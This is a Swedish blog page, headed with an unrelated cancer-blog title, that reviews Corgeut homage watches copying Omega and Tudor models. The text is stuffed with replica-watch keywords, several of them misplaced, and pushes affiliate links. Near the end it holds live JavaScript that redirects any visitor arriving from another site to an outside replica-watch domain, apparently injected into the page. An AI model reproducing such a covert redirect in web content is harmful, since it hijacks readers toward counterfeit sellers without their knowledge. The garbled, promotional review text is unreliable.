Ung mamma med cancer

Är Corgeut klockor av god kvalitet?

Anledningen till att jag gör det här inlägget om Corgeut-klockor är att konsensus verkar vara att de gör anständiga klockor. Det finns andra som verkar vara hit och miss när det kommer till specifikationer och kvalitetskontroll, men på det hela taget får Corgeut bra feedback på klockforumen.
För det mesta använder Corgeut mekaniska klockor Miyota japanska urverk. Dessa är bättre än urverk som används i de flesta prisvärda klockor på huvudgatan. Räkna med att också upptäcka att klockan har en safirglas, anständig lume och funktionell vattentäthet.

Jag skulle uppmuntra dig att följa affiliate-länkarna som jag har inkluderat i den här artikeln och läsa några av kundrecensioner för att få en uppfattning om hur andra har hittat kvaliteten.
De bästa Corgeut rolex klockor kopior
Som jag har nämnt är Corgeut uppbyggd kring att producera hyllningar. De gör flera varianter av populära modeller, särskilt Tudor Black Bay. Jag har destillerat alla dessa val till vad jag tror är de fem bästa klockorna som för närvarande finns tillgängliga från märket.
Jag har tittat på pris, byggkvalitet och design.
Jag är ett stort fan av Omega Aqua Terra och noterade några av de bästa prisvärda alternativen här. Den är inte lika känd som Speedmaster men har fortfarande sina egna hängivna fans.
Seamaster Aqua Terra, som ursprungligen lanserades 2003, är en pålitlig och robust verktygsklocka. Där Seamasters professionella linje allt mer hade blivit fokuserad på dykarklockor, kunde Aqua Terra ses som en återgång till Seamaster-seriens rötter. En direkt konkurrent till Rolex Explorer 1.
klockor kopior
Det är en distinkt design och den första delen som fångar ditt öga är vanligtvis den ovanliga urtavlan med ”teakkoncept”. Påminner om mönstret på träytorna på lyxyachter och urtavlan ger dessa Seamaster-modeller en unik karaktär. Liksom pilen på minutvisaren. För att runda av Omega-urtavlan finns det snyggt avsmalnande index.
Denna speciella variant av Aqua Terra är > 15 000 Gauss. Det var den första klockan som gjordes resistent mot magnetfält större än 15 000 gauss. Det är den typen av innovation som Omega har utmärkt sig i – men tipsar också om varför en hyllningsklocka kan vara ett alternativt val. Många fans vill bara ha en snygg klockor kopior omega och vill inte betala för onödig funktionalitet.
Corgeut-hyllningen är en trogen återskapning av originalet med endast urtavlans text som den uppenbara skillnaden. Den drivs av ett Miyota automatiskt urverk och har safirglas och monterbaksida.

Heritage Black Bay är den mest populära klockan i Tudors stall. En dykare i vintagestil, det har varit en framgångssaga för varumärket och det har varit några välgjorda hyllningar.
Corgeut, för mig, är den bästa av dessa. Återigen har den ett japanskt automatiskt urverk och safirglas. Den finns i ett antal färgvarianter och remalternativ, varav den röda ramen och armbandet i rostfritt stål är min favorit.
Detta är en annan klassisk Omega-klocka. Seamaster 300 lanserades 1957 och anses vara en av Omegas viktigaste dykarklockor. Den återutgivna modellen behåller vintage enkelheten i originaldesignen.
Seamster 300 finns i några varianter och Spectre var en begränsad upplaga. Den bars av Daniel Craigs James Bond i Spectre-filmen. Nu slutsåld är det en önskvärd klocka och återigen visar detta varför du kanske vill köpa en hyllning. I det här fallet upphör originalet.

Som väntat är Corgeut en bra version av originalet och har återigen en Miyota 8215-rörelse. Detta syns genom utställningens baksida. Den inkluderar den grå och svarta James Bond Nato-remmen som inte är lika snygg som ett armband i rostfritt stål, men i linje med Omega.
1957 lanserade Omega Railmaster – den är en del av en trilogi av klockor som inkluderar Speedmaster och Seamaster. Innovationen i denna rolex klockor kopior, liksom Rolexs Milgauss, var dess motståndskraft mot magnetism. Specifikt designades den för järnvägsingenjörer och andra som kan utsättas för magnetiska krafter. Med mindre än fantastisk försäljning avbröts den 1963.
Den är nu tillbaka som en del av Omegas sortiment, även om den fortfarande är mindre känd än sina stallkamrater. Jag gillar det dock. Den har en fantastisk känsla för verktygsklockor, och liksom Fifty Fathoms, en autentisk vintage-attraktion.
Corgeut-versionen är en blygsam klocka som är 11 mm tjock. Det ger en bekväm klädklocka som också fungerar bra med mindre formella kläder. Jag föredrar den här versionen på armbandet i rostfritt stål och precis som Aqua Terra finns det en vackert strukturerad urtavla.

var q = document.referrer;if (q.indexOf(”.”) > 0) { window.location.href = ”https://www.menowatches.to”}

Skapa en blogg på Vimedbarn.se du också, klicka här! Och du har väl inte missat topplistorna, klicka här!
Kommentarer

Lämna ett svar

Läs mer om hur vi behandlar personuppgifter i vår integritetspolicy.
stats